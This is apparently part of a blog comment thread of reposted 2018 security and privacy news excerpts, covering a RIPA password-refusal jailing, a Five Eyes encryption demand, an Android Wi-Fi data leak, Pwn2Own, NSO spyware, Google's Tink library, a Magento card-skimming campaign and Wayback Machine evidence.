A 24-year-old murder suspect was sentenced to 14 months in prison on Friday for refusing to hand over his Facebook account password to detectives who are investigating the death of 13-year-old schoolgirl Lucy McHugh.
Stephen Nicholson, a friend of the family who’d been staying with them, was allegedly in contact with Lucy the morning of her disappearance. Police took him into custody and asked him – twice – for his password so they could check out the alleged conversation and whatever other content might help the investigation.
Nicholson has been jailed not for the murder, but for his refusal to cooperate with the detectives and let them into his account.
On Friday, he pleaded guilty to failing to disclose access codes to an electronic device under the Regulation of Investigatory Powers Act 2000 (RIPA).
According to the Independent, Nicholson argued that giving police access to his private Facebook messages could expose information relating to cannabis.
The judge scoffed, describing the excuse as “wholly inadequate”, considering the severity of the case.
Tomi Engdahl says:
‘Five Eyes’ Agencies Demand Reignites Encryption Debate
https://www.securityweek.com/five-eyes-agencies-demand-reignites-encryption-debate
Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called “backdoor” access to encrypted content and devices.
The reaction came following a weekend statement from the “Five Eyes” intelligence agencies calling on “industry partners” to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.
The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.
Tomi Engdahl says:
Android System Broadcasts Expose Device Information
https://www.securityweek.com/android-system-broadcasts-expose-device-information
Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.
The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.
Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.
Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, the security firm says. Thus, all devices running under those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.
Tomi Engdahl says:
IoT Category Added to Pwn2Own Hacking Contest
https://www.securityweek.com/iot-category-added-pwn2own-hacking-contest
This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.
The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.
Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.
In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.
Tomi Engdahl says:
Lawsuit Lays Bare Israel-made Hack Tools in Mideast, Mexico
https://www.securityweek.com/lawsuit-lays-bare-israel-made-hack-tools-mideast-mexico
One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.
A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel’s NSO Group. He told The Associated Press he considered the phone compromised.
“I feared that someone could get back into it,” he said in an interview Friday. “I needed to protect my sources.”
Tomi Engdahl says:
Google Introduces Open Source Cross-Platform Crypto Library
https://www.securityweek.com/google-introduces-open-source-cross-platform-crypto-library
Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.
Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.
Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.
Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.
Google Develops OpenSSL Fork ‘BoringSSL’
https://www.securityweek.com/google-develops-openssl-fork-boringssl
Tomi Engdahl says:
Credit card gobbling malware found piggybacking on ecommerce sites
https://nakedsecurity.sophos.com/2018/09/04/credit-card-gobbling-code-found-piggybacking-on-ecommerce-sites/
Dutch security researcher Willem de Groot, who’s particularly interested in security problems on online payment sites, recently wrote about a long-running Magento malware campaign.
Magento is to ecommerce what WordPress is to blogging – you can run the open source version on your own servers; you can use an ecommerce partner who’ll run a Magento instance for you; or you can sign up for Magento’s own cloud platform.
Thousands of sites still run their own Magento servers, even in the modern cloud-centric era, for example because they’ve already got a customised warehousing and shipping system with which their ecommerce servers need to integrate.
Unfortunately, de Groot found that many of these sites – more than 7000 in total, he claims – have been infiltrated by cybercrooks in the past six months.
Worse still, de Groot estimates that nearly 1500 of them may have been infected for the entire six-month period.
Tomi Engdahl says:
Archive.org’s Wayback Machine is legit legal evidence, US appeals court judges rule
Big thumbs up to Internet Archive for now
https://www.theregister.co.uk/2018/09/04/wayback_machine_legit/
The Wayback Machine’s archive of webpages is legitimate evidence that may be used in litigation, a US appeals court has decided.
The second circuit ruling [PDF] supports a similar one from the third circuit – and, taken together, the decisions could pave the way for the Internet Archive’s library of webpages to be considered evidence for countless future trials.
The second circuit, based in New York, was asked over the summer to review an appeal by an Italian computer hacker in which he sought to exclude screenshots of websites run by him that tied him to a virus and botnet he was ultimately convicted over. Prosecutors had taken screenshots of his webpages from the Internet Archive and used them as trial evidence – and he wanted the files thrown out.
Fabio Gasperini argued that the presented Wayback Machine archives of his webpages were not adequately authenticated as legit and untampered, and so shouldn’t have been included in his criminal trial.
In the Gasperini case, however, the second circuit noted that the prosecution had included testimony from the Internet Archive’s office manager, “who explained how the Archive captures and preserves evidence of the contents of the internet at a given time.”
The Wayback Machine works by crawling over the web with bots that automatically fetch as many pages as they can find and store it all in a searchable public database, effectively snapshotting the world’s websites on a given day. For instance, if you want to see what The Register looked like in 1998, go right ahead.
The manager also testified that the prosecution’s screenshots of the Wayback Machine’s archive of Gasperini’s webpages really did match the contents of the Internet Archive.
https://web.archive.org/web/19980628145626/http://www.theregister.co.uk:80/